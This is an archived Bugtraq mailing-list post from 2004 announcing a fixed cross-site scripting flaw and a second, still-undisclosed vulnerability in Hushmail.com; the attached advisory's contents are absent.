[34104] in bugtraq
Multiple vulnerabilities in Hushmail.com
daemon@ATHENA.MIT.EDU (Calum Power)
Thu Mar 11 13:30:13 2004
Message-Id: <200403110650.i2B6o9t1028015@mailserver3.hushmail.com>
Date: Wed, 10 Mar 2004 22:50:08 -0800
To: bugtraq@securityfocus.com
Cc:
From: "Calum Power" <enune@hush.ai>
MIME-Version: 1.0
Content-type: multipart/mixed; boundary="Hush_boundary-40500c20a74ac"
--Hush_boundary-40500c20a74ac
Content-type: text/plain
Hello Bugtraq,
There have been 2 vulnerabilities found in the secure Hushmail.com webmail/data
storage service.
One is a Cross-Site-Scripting vulnerability, and is discussed in the
attached advisory. This has now been fixed.
The second is currently in the process of being fixed, and because of
this I will not be releasing details until the vulnerability is repaired.
When I do, they will be posted on my website (http://www.fribble.net/security.php).
Cheers,
Calum Power
- Cultural Jammer
- Security Enthusiast
- Hopeless Cynic
http://www.fribble.net
--Hush_boundary-40500c20a74ac
Content-type: text/plain; name="hushmail_09-03-04.txt"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="hushmail_09-03-04.txt"
--Hush_boundary-40500c20a74ac--